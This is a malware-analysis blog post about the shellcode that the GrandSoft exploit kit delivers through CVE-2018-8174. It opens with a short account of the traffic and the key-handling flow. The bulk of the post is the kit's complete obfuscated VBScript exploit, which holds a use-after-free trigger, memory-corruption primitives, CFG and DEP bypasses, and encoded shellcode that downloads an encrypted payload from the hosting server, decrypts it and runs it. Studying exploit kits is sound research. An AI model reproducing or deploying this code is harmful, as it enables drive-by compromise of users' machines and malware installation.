Analyzing Shellcode of GrandSoft's CVE-2018-8174
First
CVE-2018-8174 exploit code published in 2018-05-21.
GrandSoft Exploit Kit used to be CVE-2016-0189 before. Now, it's using CVE-2018-8174. It's almost the same as PoC, except that some obfuscation has been added. However shellcode is unique. Previously VBScript (CVE-2016-0189) code generated cryptographic keys and decoded the payload. It was changed to doing in shellcode.
Previously flow is as follows:
Random Number Generation -> Generate key Using Random Number ->
Add the key to the End of URL -> Download Encrypted Malware ->
Decode by the key
new flow is as follows:
Random key Generation -> Add the key to the End of URL ->
Download Encrypted Malware -> Decode by the key
* in shellcode
Previously flow is as follows:
Random Number Generation -> Generate key Using Random Number ->
Add the key to the End of URL -> Download Encrypted Malware ->
Decode by the key
new flow is as follows:
Random key Generation -> Add the key to the End of URL ->
Download Encrypted Malware -> Decode by the key
* in shellcode
Traffic
First let's see the recent GrandSoft traffic. The link of saz file is introduced in Kafeine's blog.https://malware.dontneedcoffee.com/2018/05/CVE-2018-8174.html
Looking at this saz file, it looks like the following.
The flow of traffic is the same. It consists of Landing Page, Exploit and Malware. CVE-2018-8174 is used for exploit, which downloads and executes malware. Malware payload is encrypted. Therefore, the shellcode decrypts the malware using some numerical values of the URL.
CVE-2018-8174
For technical explanation of CVE-2018-8174 please refer to other articles.https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/
Actually the code used in GrandSoft is like this.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Dim r4kWFTbo0 | |
Dim OOOOO0O000 | |
Dim u1QxQecTnfNH1 | |
Dim OOOOO0O0000(40) | |
Dim o3qpIbXXvzd2 | |
Dim OOOOO0O | |
Dim X6siIaXObDC3 | |
Dim OOOOO0O0(6),OOOOO0O00(6) | |
S9nDOpLGtte = "End Function " | |
Dim b3XMsCkw5 | |
Dim OOOOO0O00000,OOOOO0O000000 | |
Dim T3QDCGhIo6 | |
Dim OOOOO0O0000000 | |
Dim l2dVvpwTgOZD7 | |
Dim OOOOO0O00000000,OOOOO0O000000000 | |
Dim V8LOuHnAcRF8 | |
Dim OOOOO0O0000000000,OOOOO0O00000000000 | |
L3GBDCQZNFT = "While Not x7fypqe.C1wRZrhz " | |
Dim O000O,O000OOO | |
Dim y8NSoVzQAaSr10 | |
J5iGkJWBn = "For Each F4vTHd In l2IfOxf While Not B2DMl.d9HfMrAG For Each w1PXwuZ In y0RKKEQt " | |
OOOOO0O0000000=195940000 + 8557 | |
Dim v9UpHkIm12 | |
OOOOO0O00000=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000") | |
Dim X3OruFyGUBq13 | |
OOOOO0O000000=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000") | |
Dim K4eTurgmPOJd14 | |
OOOOO0O000=195800000 + 90093 | |
Dim a9qWUTDvuTrS15 | |
T5pctFCV = "Set m9IIiUhl = New V9NvMKu " | |
Dim U8VHUioXabcA17 | |
Function lIIII(ByVal lIlIl) | |
Dim Z4ZrCVSsLU18 | |
O000OOO0000="" | |
Dim T1UJcTQUz19 | |
For index=0 To Len(lIlIl)-1 | |
Dim T5CCqUuUd20 | |
O000OOO0000=O000OOO0000 &lIlI(Asc(Mid(lIlIl,index+1,1)),2) | |
Dim B0QkRvxfTH21 | |
Next | |
Dim i3zeBlfxLc22 | |
O000OOO0000=O000OOO0000 &"00" | |
Dim b0JmqTWpuJ23 | |
If Len(O000OOO0000)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then | |
Dim X2BSPCpsWD24 | |
O000OOO0000=O000OOO0000 &"00" | |
Dim z0uqreSro25 | |
End If | |
Dim V2VQLeiRXc26 | |
For IIIl=(&h1a1a+3208-&H26a2) To Len(O000OOO0000)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4) | |
e9sciEEDqf = "Set Q9hin = Nothing " | |
lIIIlI=Mid(O000OOO0000,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3)) | |
Dim Q2uMseQQCM28 | |
lIlIll=Mid(O000OOO0000,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504)) | |
N7MmiIIpTx = "Set E7acoa = New G1OTQ Function K3sWQT(F9MeC, H5ATAPn Sub a9MTrCZO " | |
lIIII=lIIII &"%u" &lIlIll &lIIIlI | |
Dim o3DXOOLH30 | |
Next | |
Dim F9QQltbQmsDW31 | |
End Function | |
Dim R2wcSFhyfEEl32 | |
Function lIlI(ByVal Number,ByVal Length) | |
s9HgDbuWD = "If Len(n2lab.z2INAL) > 0 Then For Each l9IlvTTU In N5QgByF " | |
IIII=Hex(Number) | |
e7WKICuQL = "If Len(Q7cENk.I8AIUv) > 0 Then Set d5zIGJLQ = Nothing " | |
If Len(IIII)<Length Then | |
O8IDAWqOeILF = "Sub L4tDKB While Not m9BkQT.L5axfDtw End Sub " | |
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros | |
Dim R2atgdRXVpO36 | |
Else | |
h3mopXfkSm = "Function m4UHTkmT(G9WcQc, s3gdzzl If Len(G4TBLnwf.O3vEm) > 0 Then If Len(Z4PolZIw.I1QvcS) > 0 Then " | |
IIII=Right(IIII,Length) | |
m9NxsPWOv = "Set b7KvI = Nothing " | |
End If | |
Dim S2LvJrTaoUmM39 | |
lIlI=IIII | |
O7VykVQFip = "Set k4spM = New H8hxq Private Sub Class c8zBRvSi Sub f2lSCL " | |
End Function | |
z2JdzgSLyrE = "If Len(a9lWy.o0Twn) > 0 Then f5oafA = L1EwTzlt & Trim(G6XbPbp.g4Xrh()) Set G0TTReMq = New Z7TCZ " | |
Function G0000(lIII) | |
Dim H5IOLSmP42 | |
Dim value | |
Dim y2UOvplgAeex43 | |
OOOOO0O00000000.mem(OOOOO0O0000000+8)=lIII+4 | |
Dim T9JMeWFbX44 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=8 'type string | |
Dim t0SSLSxubCt45 | |
value=OOOOO0O00000000.P0123456789 | |
Dim C6LGgCXIr46 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=2 | |
Dim J1qbCHws47 | |
G0000=value | |
D6UWINuBhAH = "End Sub Private Sub Class y4xBnvP End Sub " | |
End Function | |
s1CIITiCbhc = "Function F6ywsTt(k6xBJ, p2RpOTQn End Function " | |
Function G00001(lIII) | |
c4dDUJlLLqC = "End Function " | |
G00001=G0000(lIII) And (131071-65536) | |
Dim k3rMFITCXPp51 | |
End Function | |
Dim t1LcHCkwJx52 | |
Function G000011(lIII) | |
o9dogsKrLHkC = "Set m3QkPShp = New P6OwpA " | |
G000011=G0000(lIII) And (&h17eb+1312-&H1c0c) | |
Z7FlbxSDcH = "Sub H3GWLP " | |
End Function | |
Dim t3mSOULv55 | |
Sub llllll | |
Dim Z1SnlopJdSL56 | |
End Sub | |
Dim p0IdWEPHXLJ57 | |
Function vsscsc44444 | |
Dim d9pwhdnlX58 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=(&h713+3616-&H1530) | |
L8zkLNTeLx = "Set t3aRG = Nothing " | |
vsscsc44444=OOOOO0O00000000.mem(OOOOO0O0000000+(&h169c+712-&H195c)) | |
J1THdsnL = "Set G4albCG = New y9lgp End Sub " | |
End Function | |
Dim M8sgJJAfnQpH61 | |
Sub ssdsssdsdsdsdsdsdsdsd(ByRef IlIIIl) | |
Dim A2ZMKsfZdd62 | |
OOOOO0O00000000.mem(OOOOO0O0000000+(&h715+3507-&H14c0))=IlIIIl | |
b3oqMrfz = "For Each t7WrUTU In T8LHhr " | |
End Sub | |
Dim W3yMNdyVSv64 | |
Function G0000115 | |
r2XztgkSTEW = "Set u1bxACFy = New v3tEWu End Function " | |
On Error Resume Next | |
Dim S4XqwpilAH66 | |
Dim lllll | |
Dim f8sDqsTSQL67 | |
lllll=llllll | |
Dim E2BqeWcnuc68 | |
lllll=null | |
Dim W7qNHJzrG69 | |
ssdsssdsdsdsdsdsdsdsd lllll | |
Dim d2TIAZnDo70 | |
G0000115=vsscsc44444() | |
Dim n5KUcEFGiSi71 | |
End Function | |
Dim O0IKHtbN72 | |
Function G00001152(IllIll) | |
z7hhKJLp = "Set x3uhBrS = New l5QDsHqU Function T5HFVdI(I6UbI, E5PFBJ " | |
Dim llIl | |
Dim E4gIVxRTp74 | |
llIl=IllIll And &hffff0000 | |
Dim T4qMdKxD75 | |
Do While G0000(llIl+(&h748+4239-&H176f))<>544106784 Or G0000(llIl+(&ha2a+7373-&H268b))<>542330692 | |
J9RgfDLVOV = "Private Sub Class F7QIiOmm While Not P3BKMAzx.n6DEN Private Sub Class U6tvbfTa " | |
llIl=llIl-65536 | |
Dim G9JdsIMouI77 | |
Loop | |
Dim V8uiilDP78 | |
G00001152=llIl | |
L1oxiVHwW = "End Sub " | |
End Function | |
B7stXivWEk = "For Each f8ySXo In v5wKkM If Len(D8qFKpi.y6BTRoQb) > 0 Then Set S1uEaaR = Nothing " | |
Function StrCompWrapper(lIII,llIlIl) | |
Dim P1FgqQgqC81 | |
Dim lIIlI,IIIl | |
Dim s9MEXOQP82 | |
lIIlI="" | |
Dim w9GofFRihKNW83 | |
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835) | |
Dim Q5hbvtsT84 | |
lIIlI=lIIlI &Chr(G000011(lIII+IIIl)) | |
Dim l8BfqpCByv85 | |
Next | |
Dim I9CtgtQThN86 | |
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl)) | |
z6XPmMwOfI = "Set g2efvH = Nothing Private Sub Class J4qpf While Not w0pRBFsO.n5BKft " | |
End Function | |
Dim g5yPikcqhF88 | |
Function GetBaseFromImport(base_address,name_input) | |
Dim z4ztTTFnLt89 | |
Dim import_rva,nt_header,descriptor,import_dir | |
Dim e8uAELMXgrIg90 | |
Dim IIIIII | |
I0GNqfUHq = "End Sub While Not r9TTQ.R6KPot u4Vvqd = t9TSNfB & Trim(H2iGBiK.v1Lzp()) " | |
nt_header=G0000(base_address+(&h3c)) | |
Dim d3XiqbLtuk92 | |
import_rva=G0000(base_address+nt_header+&h80) | |
d5UfvJZTvkDA = "Set U8LIr = New l6VRpf For Each c1hIW In G6yuVb " | |
import_dir=base_address+import_rva | |
Dim w9NPmTRb94 | |
descriptor=0 | |
x8wgQaGh = "For Each T8IgL In n1fBIH " | |
Do While True | |
Dim W6WBdUzDbvwE96 | |
Dim Name | |
Dim x0uyChlT97 | |
Name=G0000(import_dir+descriptor*(&h14)+&hc) | |
Dim Z6XsdyIhla98 | |
If Name=0 Then | |
X7XUaLvr = "Private Sub Class N9kQCuO While Not K3KHCgNF.k6HucRFr Sub S8Xfxd " | |
GetBaseFromImport=&hBAAD0000 | |
Dim N5AiIGoghWf100 | |
Exit Function | |
Dim O2rPRNMVmG101 | |
Else | |
Dim B8cTChhq102 | |
If StrCompWrapper(base_address+Name,name_input)=0 Then | |
Dim J0ogIoHT103 | |
Exit Do | |
Dim D2Abemgyux104 | |
End If | |
Dim E2fSTQld105 | |
End If | |
Dim S7SiTdunRdMM106 | |
descriptor=descriptor+1 | |
Dim O4PSMlcs107 | |
Loop | |
F3mtkFNE = "End Function Set d8WqBE = New i6RFgKc Function m5ZmoTEf(I4LuxIdK, h9Edgqv " | |
IIIIII=G0000(import_dir+descriptor*(&h14)+&h10) | |
J8OHAemJhKA = "Set h3NHcAT = New U5kGz o5ESlP = n6ZoHw & Trim(I9VEFef.R9dOAbg()) " | |
GetBaseFromImport=G00001152(G0000(base_address+IIIIII)) | |
Dim L1XvWADVVMB110 | |
End Function | |
Dim y3zlrXnJS111 | |
Dim E6NVTggrAK112 | |
Function gddgddddddddd(G0000115222,name) | |
Dim w1vWZCiDEM113 | |
Dim p,G00001152223,index | |
Dim A1RaffVHAFV114 | |
Dim G000011522,function_names,function_ordin | |
Dim Q4MvmDCrqg115 | |
Dim Illlll | |
Dim D9PygrcSmhHo116 | |
p=G0000(G0000115222+&h3c) | |
n9Liwczo = "Sub J0QRG If Len(A7VzCkM.V6WsyFTt) > 0 Then " | |
p=G0000(G0000115222+p+&h78) | |
Dim Z7sryoHBsJ118 | |
G00001152223=G0000115222+p | |
E1rrArlu = "Set T2IkGsT = New G2hIVZ u6kVMog = t2KlTP & Trim(L9neteV.y5MGkJ()) " | |
Dim H7TRQNkIun120 | |
G000011522=G0000115222+G0000(G00001152223+&h1c) | |
Dim I6eExGoU121 | |
function_names=G0000115222+G0000(G00001152223+&h20) | |
Dim L6kLMxwC122 | |
function_ordin=G0000115222+G0000(G00001152223+&h24) | |
Dim Z2TaZfXCpJx123 | |
index=0 | |
Dim Q1vbnCTrD124 | |
Do While True | |
o4yryAoATUBs = "Set d3kHEdt = New s7EUrHp " | |
Dim lllI | |
Dim q8qsfopzJdk126 | |
lllI=G0000(function_names+index*4) | |
Dim Z0gPhSglVVKw127 | |
If StrCompWrapper(G0000115222+lllI,name)=0 Then | |
Dim A0XQZwzJTXl128 | |
Exit Do | |
Dim U2ZtOITTXH129 | |
End If | |
Dim Z2iuSSLwLN130 | |
index=index+1 | |
Dim R9ipqBakoCCT131 | |
Loop | |
u6fPloJJL = "Set O5vMVf = Nothing Set o6wTWUTq = New f1JsV l6aBcl = B8KItmy & Trim(Z2stAkdE.K5EiUeFZ()) " | |
Illlll=G00001(function_ordin+index*2) | |
t4JOAPxWao = "Private Sub Class g4FdoGo " | |
p=G0000(G000011522+Illlll*4) | |
R8LXAlutqC = " L4CCBJN = z8yaTQ & Trim(k5OsgDXz.w8buNcnK()) Sub X3UcNLRp End Sub " | |
gddgddddddddd=G0000115222+p | |
Dim f5wuapzZB135 | |
End Function | |
Dim P5OMufJnkb136 | |
Dim g9xsrGBR0 | |
Dim L5VvPmXuCHo1 | |
Function aaaAA33444333555(ByVal value) | |
Dim H9hmIkcDI2 | |
Dim High,Low | |
Dim o3GrVTUD3 | |
High=lIlI((value And &hffff0000)/&h10000,4) | |
Dim z2VyTmBR4 | |
Low=lIlI(value And &hffff,4) | |
Dim P9XStNoPA5 | |
aaaAA33444333555=Unescape("%u" &Low &"%u" &High) | |
Dim B1aZedSCP6 | |
End Function | |
Dim d2fnrwOlIol7 | |
Function lIllIl | |
Dim K6gXLTdiXw8 | |
Dim IIIl,G000011522232,G00001152223246,G0000115222324,aaaAA33444333,aaaAA33,aaaAA33444 | |
Dim p6QoNVGTH9 | |
G000011522232=lIlI(O000O,8) | |
W8xGiLZQgm = "While Not u1OONAE.I3bqF For Each H3vAFqxz In Q9wNFPGL For Each T4gktCu In H4qeP " | |
G0000115222324=Mid(G000011522232,1,2) | |
Dim M0SXXrUzUJcr11 | |
aaaAA33444333=Mid(G000011522232,3,2) | |
Dim g7ZssRnIIR12 | |
aaaAA33=Mid(G000011522232,5,2) | |
Dim Z1pDPKoE13 | |
aaaAA33444=Mid(G000011522232,7,2) | |
Dim B4Clfwhmppb14 | |
G00001152223246="" | |
F9MDopUDeLh = "For Each v9kLVdPp In E8Bscw Private Sub Class W7HqB Set x4lZenvX = Nothing " | |
G00001152223246=G00001152223246 &"%u0000%u" &aaaAA33444 &"00" | |
Dim h3NmfOTlHkqC16 | |
For IIIl=1 To 3 | |
Dim Q0dNAFMpBX17 | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33 | |
L6QTQhTyZrQc = "Sub W6zytNI End Sub While Not z2yzkCNL.S4Mkb " | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444 &G0000115222324 | |
Dim x6eucfEfWQU19 | |
Next | |
Dim h6RNTOURIQX20 | |
G00001152223246=G00001152223246 &"%u" &aaaAA33444333 &aaaAA33 | |
Dim R4cryWNyx21 | |
G00001152223246=G00001152223246 &"%u00" &G0000115222324 | |
M0KNhJRT = "End Sub " | |
lIllIl=Unescape(G00001152223246) | |
Dim X8zgTTLkMd23 | |
End Function | |
Dim G3fTNmSMKU24 | |
Function jjjjj333333(ShellcodeAddrParam) 'bypass cfg | |
Dim c7KtVzyvFcT25 | |
Dim G00001152223246 | |
Dim p8xDxemX26 | |
G00001152223246=String((100334-65536),Unescape("%u4141")) | |
Dim x3sMCAqdr27 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam) | |
Dim c4RLWlbqTRqe28 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam) | |
Dim P4ZPKcRItFXG29 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h3000) | |
Dim b9RppUdna30 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h40) | |
Dim y7NHmxEO31 | |
G00001152223246=G00001152223246 &aaaAA33444333555(ShellcodeAddrParam-8) | |
Dim p1rPTbQAzzNu32 | |
G00001152223246=G00001152223246 &String(6,Unescape("%u4242")) | |
q5mhWpHSO = "Function f5WdLxFT(W1IzXrlr, h4DwhVc Private Sub Class d9qfwI Set R6OMgp = New z2HbLTe " | |
G00001152223246=G00001152223246 &lIllIl() | |
Dim o7nipSBlTptJ34 | |
G00001152223246=G00001152223246 &String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141")) | |
R7HslHPu = "Sub h2fHJ " | |
jjjjj333333=G00001152223246 | |
Dim T1rCzxbaBmS36 | |
End Function | |
Dim X7PXMUADl37 | |
Function eeee6666(mmm22222) | |
Dim d1tFcNgPT38 | |
Dim G00001152223246 | |
Dim T1nliuABi39 | |
Dim lllllI | |
Dim C8GxXneW40 | |
lllllI=mmm22222+&h23 | |
T9NEwrqhcN = "End Function " | |
G00001152223246="" | |
Dim D6DVtLOSbWeA42 | |
G00001152223246=G00001152223246 &aaaAA33444333555(lllllI) | |
Dim F7DDoWkmetNA43 | |
G00001152223246=G00001152223246 &String((&hb8-LenB(G00001152223246))/2,Unescape("%4141")) | |
Dim O1TvStXN44 | |
G00001152223246=G00001152223246 &aaaAA33444333555(O000OOO) | |
Dim x2QKxZPgWSrm45 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h1b) | |
Dim g3TSGwNNTvl46 | |
G00001152223246=G00001152223246 &aaaAA33444333555(0) | |
I5cwEhOROJZp = "End Sub " | |
G00001152223246=G00001152223246 &aaaAA33444333555(mmm22222) | |
Dim G8gTBuqohTA48 | |
G00001152223246=G00001152223246 &aaaAA33444333555(&h23) | |
Dim I2TEHrVNkSn49 | |
G00001152223246=G00001152223246 &String((&400-LenB(G00001152223246))/2,Unescape("%u4343")) | |
Dim C5LKfeoz50 | |
eeee6666=G00001152223246 | |
Dim Q1kBLgWai51 | |
End Function | |
Dim w9hKsTiITQT52 | |
Sub ExecuteShellcode | |
Dim a5vsITVrr53 | |
OOOOO0O00000000.mem(OOOOO0O0000000)=&h4d 'DEP bypass | |
W9yiSsZEFH = "End Sub End Sub End Sub " | |
OOOOO0O00000000.mem(OOOOO0O0000000+8)=0 | |
V3hTApwpF = "Set G9fhXW = New A4rXxqo Set u8rTTyc = New o4VFg Private Sub Class e9TXunV " | |
msgbox(OOOOO0O0000000) 'VT replaced | |
e9vSIHqy = "For Each w2dcN In m3UmafoO Function E1guW(s8Tdm, Q5ygfTXZ Function D7bxCbg(L2AXuRG, i0ZfGm " | |
End Sub | |
Dim K3dzbfOBuzgb57 | |
Dim q9hgUHqmUShe58 | |
Class cla1 | |
Private Sub Class_Terminate() | |
Set OOOOO0O0(OOOOO0O000)=OOOOO0O((&h1078+5473-&H25d8)) | |
OOOOO0O000=OOOOO0O000+(&h14b5+2725-&H1f59) | |
OOOOO0O((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d) | |
End Sub | |
End Class | |
Class cla2 | |
Private Sub Class_Terminate() | |
Set OOOOO0O00(OOOOO0O000)=OOOOO0O((&h15b+3616-&Hf7a)) | |
OOOOO0O000=OOOOO0O000+(&h880+542-&Ha9d) | |
OOOOO0O((&h1f75+342-&H20ca))=(&had3+3461-&H1857) | |
End Sub | |
End Class | |
Class IIIlIl | |
End Class | |
Class llIIl | |
Dim mem | |
Function P | |
End Function | |
Function SetProp(Value) | |
mem=Value | |
SetProp=0 | |
End Function | |
End Class | |
Class IIIlll | |
Dim mem | |
Function P0123456789 | |
P0123456789=LenB(mem(OOOOO0O0000000+8)) | |
End Function | |
Function SPP | |
End Function | |
End Class | |
Class lllIIl | |
Public Default Property Get P | |
Dim llII | |
P=174088534690791e-324 | |
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c) | |
OOOOO0O0(IIIl)=(&h2176+711-&H243d) | |
Next | |
Set llII=New IIIlll | |
llII.mem=OOOOO0O00000 | |
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c) | |
Set OOOOO0O0(IIIl)=llII | |
Next | |
End Property | |
End Class | |
Class llllII | |
Public Default Property Get P | |
Dim llII | |
P=636598737289582e-328 | |
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84) | |
OOOOO0O00(IIIl)=(&h442+2598-&He68) | |
Next | |
Set llII=New IIIlll | |
llII.mem=OOOOO0O000000 | |
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b) | |
Set OOOOO0O00(IIIl)=llII | |
Next | |
End Property | |
End Class | |
Set OOOOO0O0000000000=New lllIIl | |
Set OOOOO0O00000000000=New llllII | |
Sub UAF | |
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233) | |
Set OOOOO0O0000(IIIl)=New IIIlIl | |
Next | |
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed) | |
Set OOOOO0O0000(IIIl)=New llIIl | |
Next | |
OOOOO0O000=0 | |
For IIIl=0 To 6 | |
ReDim OOOOO0O(1) | |
Set OOOOO0O(1)=New cla1 | |
Erase OOOOO0O | |
Next | |
Set OOOOO0O00000000=New llIIl | |
OOOOO0O000=0 | |
For IIIl=0 To 6 | |
ReDim OOOOO0O(1) | |
Set OOOOO0O(1)=New cla2 | |
Erase OOOOO0O | |
Next | |
Set OOOOO0O000000000=New llIIl | |
End Sub | |
Sub InitObjects | |
OOOOO0O00000000.SetProp(OOOOO0O0000000000) | |
OOOOO0O000000000.SetProp(OOOOO0O00000000000) | |
OOOOO0O0000000=OOOOO0O000000000.mem | |
End Sub | |
Sub sssfsfsfsfsfs222 | |
UAF | |
InitObjects | |
vb_adrr=G0000115() | |
vbvvvvvvvv=G00001152(G0000(vb_adrr)) | |
mbmmmmmmm=GetBaseFromImport(vbvvvvvvvv,"msvcrt.dll") | |
mbmbmdddcdd=GetBaseFromImport(mbmmmmmmm,"kernelbase.dll") | |
ntffdddddfss=GetBaseFromImport(mbmmmmmmm,"ntdll.dll") | |
O000OOO=gddgddddddddd(mbmbmdddcdd,"VirtualProtect") | |
O000O=gddgddddddddd(ntffdddddfss,"NtContinue") | |
ssdsssdsdsdsdsdsdsdsd c111111() | |
c2222222=vsscsc44444()+8 | |
ssdsssdsdsdsdsdsdsdsd jjjjj333333(c2222222) | |
mmm22222=vsscsc44444()+69596 | |
ssdsssdsdsdsdsdsdsdsd eeee6666(mmm22222) | |
mnmm4333333=vsscsc44444() | |
ExecuteShellcode | |
End Sub | |
Function c111111() | |
locationUrl = "http://" & window.location.hostname & "/7" | |
strString = locationUrl | |
linkHex ="" | |
For i=1 To Len(strString) | |
linkHex = linkHex + Hex(Asc(Mid(strString,i,1))) | |
Next | |
stringSC = "" | |
stringSC = linkHex + "" | |
g = Round(Len(stringSC)/4) | |
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00" | |
outStr = "" | |
For i = 1 to Len(stringSC) Step 4 | |
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2) | |
Next | |
U109 = "%u" | |
U88 = "%uE8" | |
UF1 = "%uF" | |
outStr = outStr + "%u0000" | |
G00001152223246=Unescape(""& U109 &"0000"& U109 &"0000"& U109 &"0000"& U109 &"0000") &Unescape(""& U109 &"9CE9"& U109 &"0002"& U109 &"3100"& U109 &"64C9"& U109 &"718B"& U109 &"8B30"& U109 &"0C76"& U109 &"768B"& U109 &"8B1C"& U109 &"086E"& U109 &"468B"& U109 &"8B20"& U109 &"6636"& U109 &"4839"& U109 &"7518"& U109 &"8BF2"& U109 &"3C45"& U109 &"548B"& U109 &"7805"& U109 &"EA01"& U109 &"728B"& U109 &"0120"& U109 &"52EE"& U109 &"C931"& U109 &"4149"& U109 &"01AD"& U109 &"31E8"& U109 &"0FDB"& U109 &"10BE"& U109 &"F238"& U109 &"0874"& U109 &"CBC1"& U109 &"010E%u40D3"& UF1 &"1EB%u1F3B%uE775%u8B5A%u2472%uEE01%u8B66%u4E0C%u728B%u011C%u8BEE%u8E04"& U88 &"01%uC3AB"& U88 &"5F"& UF1 &"F9F"& UF1 &"FFF%uB4E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FAF"& UF1 &"FFF%uAAE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"FA5"& UF1 &"FFF%uA0E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F9B"& UF1 &"FFF%u96E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F91"& UF1 &"FFF%u3368%u0032%u6800%u7375%u7265"& UF1 &"F54"& UF1 &"C57%uC589%u7CE8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F77"& UF1 &"FFF%u6E68%u7465%u6800%u6977%u696E"& UF1 &"F54"& UF1 &"457%uC589%u62E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F5D"& UF1 &"FFF%u58E8"& UF1 &"FFF"& U88 &"FF"& UF1 &"F53"& UF1 &"FFF%u4EE8"& UF1 &"FFF%u6AFF%u6840%u1000%u0000%u0068%u07D0%u6A00"& UF1 &"F00%uC457%u0789%uC689%u57FF%u89CC%u8106%u00C6%u0010%u5600%u0068%u0008"& UF1 &"F00%uC857%u078B"& UF1 &"B89%uC383%u8904%u83F9%u6DE9%uC689%uC683"& UF1 &"F08%u5330%u5651%u57FF%u8BE8%u8907%u81C3%u00C3%u0010%u8900%u83F9%u67E9%u30FF%u5153"& UF1 &"F53%uE457%u378B%uC683%u6A08%u6A00%u6A00%u6A00%u5600%u57FF%u89EC%uEC47%u006A%u006A%u006A%u006A"& UF1 &"F56%uEC77%u57FF%u89F0"& UF1 &"047%u078B%u0005%u0010%u6A00%u6A00%u6A50%u6A02%u6A00%u6802%u0000%u4000"& UF1 &"F50%uD457%u4789%u8BD4%u8137%u08C6%u0023%uC700"& UF1 &"846%u0001%u0000%u078B%u188B%u7E83%u00F8%u4074"& UF1 &"089"& U88 &"83%u5008%u0068%u0004%u5600%u77FF"& UF1 &"FF0"& UF1 &"857%u7E83%u00F8%u2874%u4E8B%u89F8%u48F0%u8140%uAAC3%u0000%u8000%u48F3%u1830"& UF1 &"2E2"& UF1 &"089"& U88 &"83%u6A04%u5000%u76FF%u56F8%u77FF"& UF1 &"FD4%uD857%uBAEB%u77FF"& UF1 &"FD4%uDC57%u77FF"& UF1 &"FF0"& UF1 &"C57%u77FF"& UF1 &"FEC"& UF1 &"C57"& UF1 &"B89%uEB83%u8B4D%u0507%u1000%u0000"& UF1 &"989%uE983%u8B7B%u812F%u00C5%u0030%u5000%u5153"& UF1 &"F55%uE457%u6C68%u3233%u6800%u6873%u6C65"& UF1 &"F54%uE057%u9090%u9090%u8990%u83C5%u04EF%u07C7%u065A%u4C98%u04E8"& UF1 &"FFE%u8BFF%u8137%u00C6%u0010%u8B00%u0507%u3000%u0000"& UF1 &"B89%uEB83%u8955%u81FE%u83EE%u0000%u8900%u81F9%u8FE9%u0000%u6A00%u6A01%u5000%u5156%u006A%u57FF%u83FC%u05F8%uD374%u006A"& UF1 &"E6A%u57FF%u72C0%u7500%u6E00%u6100%u7300%u0000%u6300%u6D00%u6400%u0000%u2500%u7300%u2200%u2500%u7300%u2200%u0000%u2500%u2F73%u6425%u2500%u7300%u2500%u6400%u2E00%u6500%u7800%u6500%u0000%u6300%u6D00%u6400%u2000%u2F00%u4300%u2000%u0000"& U88 &"00"& UF1 &"DBA"& UF1 &"FFF%u6FD0%u26FD%u6F8A%u13C6%u3B42%u208B%u8E70%u1022%uB1AD%u4F89%u8EF8"& UF1 &"470"& UF1 &"C13%u638D%uB973%u01D5%u1DF9%uA97F%u70B5%uA596%u709F%uA596%uC2C2%uBE70%uA391%uB75F%uAE00%uBCB9%uE926%u639E%uD37E%u88A8%u0000%u0000" & outStr ) | |
G00001152223246=G00001152223246 & String((&h80000-LenB(G00001152223246))/2,Unescape("%u4141")) | |
c111111=G00001152223246 | |
End Function | |
sssfsfsfsfsfs222 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function c111111() | |
locationUrl = "http://" & window.location.hostname & "/7" | |
strString = locationUrl | |
linkHex ="" | |
For i=1 To Len(strString) | |
linkHex = linkHex + Hex(Asc(Mid(strString,i,1))) | |
Next | |
stringSC = "" | |
stringSC = linkHex + "" | |
g = Round(Len(stringSC)/4) | |
if g <> (Len(stringSC)/4) Then stringSC = stringSC + "00" | |
outStr = "" | |
For i = 1 to Len(stringSC) Step 4 | |
outStr = outStr + "%u" + Mid(stringSC,i+2,2) + Mid(stringSC,i,2) | |
Next | |
U109 = "%u" | |
U88 = "%uE8" | |
UF1 = "%uF" | |
outStr = outStr + "%u0000" | |
